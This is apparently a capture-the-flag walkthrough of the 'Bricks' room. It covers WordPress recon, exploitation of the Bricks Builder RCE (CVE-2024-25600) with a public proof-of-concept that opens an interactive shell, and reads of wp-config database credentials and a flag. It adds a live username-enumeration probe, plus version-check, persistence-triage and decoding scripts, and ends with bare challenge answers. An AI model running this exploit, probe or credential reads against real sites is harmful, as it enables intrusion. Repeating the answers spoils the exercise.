
root@ip-10-10-108-234:~# nmap -p1-1000 10.10.12.59

Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-17 04:50 BST
Nmap scan report for bricks.thm (10.10.12.59)
Host is up (0.0058s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 02:37:24:E8:D3:1F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds

A second run with service/version detection, after the target had been redeployed at 10.10.85.120 (the default top-1000 port set now also picks up 3306/tcp, which the earlier -p1-1000 scan could not see). Port 80 is not a web server at all but a WebSockify proxy; the WordPress site lives on 443:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-17 12:08 EDT
Nmap scan report for bricks.thm (10.10.85.120)
Host is up (0.20s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 f5:70:a3:e8:2c:a8:05:c0:90:c6:9b:24:13:06:4b:3c (RSA)
|   256 d1:9c:ae:3e:09:6d:30:0e:86:5c:10:3c:42:2e:6f:c0 (ECDSA)
|_  256 a3:2c:b7:2a:07:9e:f3:75:4a:ba:65:76:b6:78:99:36 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 17 Apr 2024 16:09:01 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     Error response
|     Error code: 405
|     Message: Method Not Allowed.
|     Error code explanation: 405 - Specified method is invalid for this resource.
|   HTTPOptions:
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Wed, 17 Apr 2024 16:09:01 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     Error response
|     Error code: 501
|     Message: Unsupported method ('OPTIONS').
|_    Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.
443/tcp  open  ssl/http Apache httpd
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
|_http-generator: WordPress 6.5
|_ssl-date: TLS randomness does not represent time
|_http-title: Brick by Brick
| tls-alpn:
|   h2
|_  http/1.1
|_http-server-header: Apache
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
(raw SF-Port80-TCP fingerprint omitted here; it is the same 405/501 WebSockify error page already decoded under fingerprint-strings above)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.47 seconds

Login request captured in Burp, with the username marked as an Intruder payload position (§...§):

POST /wp-login.php HTTP/2
Host: bricks.thm
Cookie: wordpress_test_cookie=WP%20Cookie%20check
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://bricks.thm/wp-login.php?redirect_to=https%3A%2F%2F10.10.85.120%2Fwp-admin%2F&reauth=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
Origin: https://bricks.thm
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

log=§admin§&pwd=password&wp-submit=Log+In&redirect_to=https%3A%2F%2F10.10.85.120%2Fwp-admin%2F&testcookie=1

Result for the payload administrator: Error: The password you entered for the username administrator is incorrect.

WordPress (6.5 included) still answers an unknown username with "The username X is not registered on this site", so this wording confirms that administrator is an existing account even though the password was wrong. That is a username-enumeration oracle, and the reason the login form is worth probing before any brute force.
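Turning that oracle into a repeatable check, as an added example that is not part of the original writeup: the two sample responses below are constructed from WordPress's standard login error wording (not captured from bricks.thm), `classify` maps a response body to what it leaks, and `probe_username` sends the same form fields as the Burp request above to a caller-supplied URL while skipping certificate validation the way wpscan --disable-tls-checks does.

```python
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Constructed samples of the two wp-login.php error fragments (WordPress 6.x wording);
# not captured from bricks.thm.
SAMPLE_KNOWN_USER = (
    '<div id="login_error"><strong>Error:</strong> The password you entered for the '
    'username <strong>administrator</strong> is incorrect. '
    '<a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>'
)
SAMPLE_UNKNOWN_USER = (
    '<div id="login_error"><strong>Error:</strong> The username <strong>nobody</strong> '
    'is not registered on this site. If you are unsure of your username, '
    'try your email address instead.</div>'
)


def classify(body: str) -> str:
    """Map a wp-login.php response body to what it reveals about the submitted username."""
    text = re.sub(r"<[^>]+>", "", body)  # strip tags so the wording match is stable
    if "is not registered on this site" in text:
        return "unknown-user"
    if "The password you entered for the username" in text:
        return "valid-user"
    if "login_error" not in body:
        return "no-error"  # no error box at all: credentials were accepted
    return "other-error"  # lockout plugin, CAPTCHA, generic message, etc.


def build_login_request(base_url: str, username: str, password: str = "password") -> urllib.request.Request:
    """Same form fields as the browser/Burp request shown above."""
    data = urllib.parse.urlencode({
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": base_url + "/wp-admin/",
        "testcookie": "1",
    }).encode()
    req = urllib.request.Request(base_url + "/wp-login.php", data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", "wordpress_test_cookie=WP%20Cookie%20check")
    return req


def probe_username(base_url: str, username: str) -> str:
    """Live probe against a caller-supplied URL; certificate checks are disabled on purpose."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(build_login_request(base_url, username), context=ctx, timeout=10) as resp:
            return classify(resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as err:
        return classify(err.read().decode(errors="replace"))


if __name__ == "__main__":
    for name in ("admin", "administrator", "editor"):
        print(name, probe_username("https://bricks.thm", name))
```

The classifier strips tags before matching because the username is wrapped in its own <strong> element; matching on the raw HTML would break as soon as a theme or plugin changes the markup around it.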

wpscan --url https://bricks.thm/ --disable-tls-checks

[+] WordPress theme in use: bricks
 | Location: https://bricks.thm/wp-content/themes/bricks/
 | Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
 | Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
 | Style Name: Bricks
 | Style URI: https://bricksbuilder.io/
 | Description: Visual website builder for WordPress....
 | Author: Bricks
 | Author URI: https://bricksbuilder.io/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.9.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
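The version is the whole story here: Bricks Builder up to and including 1.9.6 is affected by CVE-2024-25600, an unauthenticated remote code execution bug fixed in 1.9.6.1, and wpscan's 80% confidence comes from nothing more than the Version: line in style.css. An added example (not from the writeup, and not wpscan's code) that reads the same header and compares it with the fixed release; the style.css text embedded below is constructed to mirror the fields wpscan printed, and `fetch_style_css` assumes the theme path wpscan reported.

```python
import re
import ssl
import urllib.request

# CVE-2024-25600 (Bricks Builder, unauthenticated RCE) affects versions up to and
# including 1.9.6; the fix shipped in 1.9.6.1.
FIXED_VERSION = "1.9.6.1"

# Constructed sample of a theme style.css header carrying the fields wpscan printed;
# not fetched from bricks.thm.
SAMPLE_STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Description: Visual website builder for WordPress.
Author: Bricks
Author URI: https://bricksbuilder.io/
Version: 1.9.5
*/
body { margin: 0; }
"""


def parse_theme_header(css: str) -> dict:
    """Pull 'Key: value' pairs out of the leading comment block of a theme's style.css."""
    match = re.search(r"/\*(.*?)\*/", css, re.S)
    header = match.group(1) if match else css
    fields = {}
    for line in header.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def version_tuple(version: str) -> tuple:
    """'1.9.6.1' -> (1, 9, 6, 1); tuple comparison handles the extra component."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def is_vulnerable(version: str) -> bool:
    return version_tuple(version) < version_tuple(FIXED_VERSION)


def fetch_style_css(base_url: str) -> str:
    """Live fetch, ignoring the self-signed certificate seen in the scan."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = base_url.rstrip("/") + "/wp-content/themes/bricks/style.css"
    with urllib.request.urlopen(url, context=ctx, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def check_target(css: str) -> str:
    """One-line verdict for the theme header in css."""
    header = parse_theme_header(css)
    version = header.get("Version")
    if not version:
        return "no Version header found"
    state = "VULNERABLE" if is_vulnerable(version) else "not affected"
    return f"{header.get('Theme Name', '?')} {version}: {state} (fixed in {FIXED_VERSION})"


if __name__ == "__main__":
    print(check_target(fetch_style_css("https://bricks.thm")))
```

A header-only check is a heuristic: the Version: line can be edited or left stale, which is why wpscan caps its confidence below 100%. Treat a "VULNERABLE" verdict as a reason to test, not as proof.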

Bricks 1.9.5 falls inside the range affected by CVE-2024-25600 (unauthenticated remote code execution in the Bricks Builder theme, fixed in 1.9.6.1), so a public proof-of-concept is run against the redeployed target:

┌──(root㉿kali)-[/home/kali/CVE-2024-25600-EXPLOIT]
└─# python3 CVE-2024-25600.py -u https://10.10.148.55

Coded By: K3ysTr0K3R --> Hello, Friend!

[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://10.10.148.55
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> ls
650c844110baced87e1606453b93f22a.txt  index.php  kod  license.txt  phpmyadmin  readme.html
wp-activate.php  wp-admin  wp-blog-header.php  wp-comments-post.php  wp-config-sample.php
wp-config.php  wp-content  wp-cron.php  wp-includes  wp-links-opml.php  wp-load.php
wp-login.php  wp-mail.php  wp-settings.php  wp-signup.php  wp-trackback.php  xmlrpc.php

Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}

Shell> systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M

[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure

[Install]
WantedBy=multi-user.target
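Everything about this unit is a persistence tell: it was created by hand under /etc/systemd/system rather than shipped in /lib/systemd/system, its name (ubuntu) borrows the OS name and matches neither its Description nor the binary it launches, and that binary hides inside NetworkManager's library directory with an nm- prefix. An added example (not from the writeup) that turns those observations into a repeatable triage check: it parses admin-created units, flags an ExecStart binary that sits in a library directory yet belongs to no package, and flags a unit whose name matches neither its Description nor its binary. The unit text embedded is the one printed above; `dpkg_owner` assumes a Debian/Ubuntu host and is replaced by a stub in offline use.

```python
import os
import shutil
import subprocess
from typing import Callable, List, Optional

# Constructed input: the unit printed by `systemctl cat ubuntu.service` above.
SAMPLE_UNIT_PATH = "/etc/systemd/system/ubuntu.service"
SAMPLE_UNIT = """[Unit]
Description=TRYHACK3M

[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""

# Directories where an executable is expected to belong to a package.
LIBRARY_DIRS = ("/lib/", "/usr/lib/", "/usr/libexec/", "/lib64/", "/usr/lib64/")


def parse_unit(text: str) -> dict:
    """Minimal INI parser that keeps repeated keys (systemd allows several ExecStart= lines)."""
    sections: dict = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def dpkg_owner(path: str) -> Optional[str]:
    """Which Debian/Ubuntu package ships this file? None if dpkg is absent or nobody owns it."""
    if shutil.which("dpkg") is None:
        return None
    result = subprocess.run(["dpkg", "-S", path], capture_output=True, text=True)
    return result.stdout.split(":", 1)[0] if result.returncode == 0 else None


def triage_unit(path: str, text: str,
                owner_of: Callable[[str], Optional[str]] = dpkg_owner) -> List[str]:
    """Return findings for one unit file; an empty list means nothing stood out."""
    unit = parse_unit(text)
    findings = []
    exec_lines = unit.get("Service", {}).get("ExecStart", [])
    # Drop systemd's exec-prefix characters (-, @, :, +, !) before looking at the path.
    binaries = [line.split()[0].lstrip("-@:+!") for line in exec_lines if line.split()]
    for binary in binaries:
        if binary.startswith(LIBRARY_DIRS) and owner_of(binary) is None:
            findings.append(f"{binary} sits in a package directory but no package owns it")
    name = os.path.basename(path).rsplit(".", 1)[0].lower()
    description = " ".join(unit.get("Unit", {}).get("Description", [])).lower()
    if description and name not in description and not any(
            name in os.path.basename(b).lower() for b in binaries):
        findings.append(f"unit name '{name}' matches neither its Description nor its ExecStart binary")
    return findings


def triage_directory(directory: str = "/etc/systemd/system",
                     owner_of: Callable[[str], Optional[str]] = dpkg_owner) -> dict:
    """Run triage_unit over every admin-created .service file in the directory."""
    results = {}
    if not os.path.isdir(directory):
        return results
    for entry in sorted(os.listdir(directory)):
        path = os.path.join(directory, entry)
        if entry.endswith(".service") and os.path.isfile(path):
            with open(path, errors="replace") as fh:
                hits = triage_unit(path, fh.read(), owner_of)
            if hits:
                results[path] = hits
    return results


if __name__ == "__main__":
    for unit_path, hits in triage_directory().items():
        print(unit_path)
        for hit in hits:
            print("  -", hit)
```

Masked units are symlinks to /dev/null and are skipped by the isfile check. The name-mismatch rule is deliberately loose (substring match, case-insensitive) so that NetworkManager.service launching /usr/sbin/NetworkManager passes while ubuntu.service launching nm-inet-dialog does not.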

Shell> cat wp-config.php

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', 'lamp.sh' );

Shell> head /lib/NetworkManager/inet.conf
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d

The ID is hex-encoded text; the hex decodes to base64, that base64 decodes to a second base64 layer, and the innermost layer is two bc1 (bech32) wallet addresses run together:

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
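Peeling the layers by hand is error-prone, so here is an added example (not from the writeup) that strips hex and base64 layers until the data stops being printable text, then splits the result on the bc1 prefix: the bech32 data alphabet does not contain the letter b, so every bc1 necessarily starts a new address. The input is the ID string printed above; the decoder functions and their names are this example's own.

```python
import base64
import binascii
import re

# Copied from the head of /lib/NetworkManager/inet.conf shown above.
INET_CONF_ID = (
    "5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c7055"
    "5a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a62553134"
    "59316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959"
    "556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d"
)

# Bech32 data alphabet: no '1', 'b', 'i' or 'o'.
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"


def try_hex(s: str):
    """Hex -> text, or None if the string is not hex / not decodable as UTF-8."""
    try:
        return bytes.fromhex(s.strip()).decode()
    except (ValueError, UnicodeDecodeError):
        return None


def try_base64(s: str):
    """Base64 -> text, or None; strict alphabet and length checks avoid false positives."""
    s = s.strip()
    if len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None


def peel(blob: str, max_layers: int = 8) -> list:
    """Strip hex/base64 layers while each result is still printable text.

    Returns [(layer_name, value), ...] starting with ('raw', blob).
    """
    layers = [("raw", blob)]
    current = blob
    for _ in range(max_layers):
        for name, decoder in (("hex", try_hex), ("base64", try_base64)):
            decoded = decoder(current)
            if decoded and decoded.isprintable() and decoded != current:
                layers.append((name, decoded))
                current = decoded
                break
        else:
            break  # neither decoder produced printable text: innermost layer reached
    return layers


def split_bech32_candidates(s: str) -> list:
    """Each 'bc1' starts a new address because 'b' is outside the bech32 data alphabet."""
    return re.findall(r"bc1[%s]+" % BECH32_CHARSET, s)


if __name__ == "__main__":
    for name, value in peel(INET_CONF_ID):
        print(f"{name:>6}: {value[:60]}{'...' if len(value) > 60 else ''}")
    for addr in split_bech32_candidates(peel(INET_CONF_ID)[-1][1]):
        print(f"candidate address ({len(addr)} chars): {addr}")
```

The printable-text test is what stops the loop at the right place: a 42-character bech32 string is not valid base64 (its length is not a multiple of four) and contains non-hex letters, so neither decoder fires on it. The two candidates differ by one inserted character (hd5 versus had5), which is why checking each one against a block explorer separately matters before attributing anything to it.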

rm kod/data/system/install.lock

admin password

bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r

Ivan Gennadievich Kondratiev

LockBit Ransomware Group